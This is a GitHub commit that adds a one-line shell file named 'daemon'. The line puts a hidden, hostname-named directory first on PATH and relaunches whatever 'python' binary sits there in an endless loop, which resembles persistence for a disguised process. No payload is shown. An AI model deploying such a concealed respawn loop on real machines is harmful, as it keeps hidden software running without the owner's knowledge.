Create daemon

This commit is contained in:
Dapa
2025-02-04 02:26:55 +07:00
committed by GitHub
parent fd0dd0dc4c
commit 3da00d9749

1
daemon Normal file
View File

@ -0,0 +1 @@
cd $HOME/.$(echo $(hostname))/bin && PATH=$(pwd):$PATH && while [ 1 ]; do python; sleep 1; done